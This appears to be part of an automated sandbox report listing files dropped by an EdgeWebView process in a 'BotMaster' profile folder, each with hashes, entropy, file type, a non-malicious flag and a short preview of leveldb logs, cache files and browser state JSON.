                                                                                                                                                                                                                SSDEEP:6:FQVU5gq1wknaZ5KrWLYQV+d4rl2KLlvQVU/l+q2PwknaZ5KrWLYQV+d4rK+IFUv:S+WrHUdqL6+/l+vYrHUd53FUv
                                                                                                                                                                                                                MD5:981DD31E65C50AE4E153F3EB08C00CDE
                                                                                                                                                                                                                SHA1:42106340AC9DA3C69565BB8764B02C75CA5A9B02
                                                                                                                                                                                                                SHA-256:29F01F13F590E699B03428A4704EC66B021CBCDDCC19C30CF442EA548B37432D
                                                                                                                                                                                                                SHA-512:4C2C5D3D988EF17E5CD10A671CD4EF5C3F298C7304D7D6CAE7D47532BA3060A761C2D9D60732C6169402FC34DB18026A9B1F6093C55DF5BAB1573D311195E994
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:01.825 1d5c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db since it was missing..2024/03/10-17:46:01.847 1d5c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):443
                                                                                                                                                                                                                Entropy (8bit):3.87355192141482
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:G0Xtqcsqc9Ct3msNJ4mv1m9p//3mQtmF2lHRmF2lQt/3m8Gvmt9ll1mF2lA3m88p:G0nYUtTNop//z3T6/DPAHlT0
                                                                                                                                                                                                                MD5:F759D25DBFC65F4C7681B26F4FBD25BE
                                                                                                                                                                                                                SHA1:64AA11F76F0062AD4E737CDED27D1DFCEECFF6AB
                                                                                                                                                                                                                SHA-256:47B242BEAF1AE599C4475DE3D0377706DFFDAC14E81D9D15557D1AEA6F7F3B1D
                                                                                                                                                                                                                SHA-512:786F62CF463BA556C1F799293347BC1B224862A2B4FDE5E11355E8A6D509114965A7351C28E846FCC3C135FA57BD2EA65EB3AE3257C1FABE503423F9E05C77CC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_...../...................20_.....W.J+.................19_......qY.................18_.......w<.................20_.......ln.................19_......Y...................18_.....%.{..................9_.....f..U.................9_.....

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):325
                                                                                                                                                                                                                Entropy (8bit):5.272900413228271
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVUHV1wknaZ5KrWLYQV+d4rzs52KLlvQVUhUh+q2PwknaZ5KrWLYQV+d4rzAdIg:S+orHUd59L6+hQ+vYrHUduFUv
                                                                                                                                                                                                                MD5:733A53E3C85978FE1996CE0B1F41FC25
                                                                                                                                                                                                                SHA1:DEB5A43099D1908C8C02D8365042BA37932DF52E
                                                                                                                                                                                                                SHA-256:9C891CF312476C27C094BE293C007FAC97484AB71E8293EC2FA0037E116C10FE
                                                                                                                                                                                                                SHA-512:011C695EE13B9F69508BA9B4876DB1D3D31758029F1811DE392AC97E1F9A5926DC463B205FDA9E9056771FB752A49A8FB21E630A90EFC8E96D2AC71F561882F7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:01.719 1d5c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata since it was missing..2024/03/10-17:46:01.767 1d5c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GrShaderCache\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GrShaderCache\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GrShaderCache\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GrShaderCache\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GrShaderCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsNlB+:Ls30
                                                                                                                                                                                                                MD5:F525A8304F65B0C701268E0B7D39BD48
                                                                                                                                                                                                                SHA1:250C2C56FC5B80F4BBF2A194136AE15B1B59C940
                                                                                                                                                                                                                SHA-256:FD4F636E44CC8A97BBDF077AA9D2F4B6E91233D3828013D1DD0A83C639FBA293
                                                                                                                                                                                                                SHA-512:4C741944D043E85D0A9E63EE36B6CC66C2985ED4A615B1A5E7777B27B8EFFEB10837CB33E4832028385298BC8E71854931920436CD0BC1989EAA922544ECF42F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........................................q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GraphiteDawnCache\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GraphiteDawnCache\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GraphiteDawnCache\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GraphiteDawnCache\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\GraphiteDawnCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsNlKX+:Ls3q+
                                                                                                                                                                                                                MD5:DC58C6BCC602083558C15AFAA1D7D4C2
                                                                                                                                                                                                                SHA1:79B40E92383D3978D6CD397786B981BE69B7EBA7
                                                                                                                                                                                                                SHA-256:1857A1135581C282D0C3AF9C937937ACE3AD0FEF4B1012C5C98A95D30E57F142
                                                                                                                                                                                                                SHA-512:FC3FEE99D312074CB12779781E9CF8C50DBF1D5F62DC4DDAA00E18F2AC0F962FF6309CD427F35C77FD23163C934E112A9CDF56554237587E2662D54EE97B95A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..........................................q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Last Version

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Local State (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Local State~RF616da6.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Local State~RF616e81.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
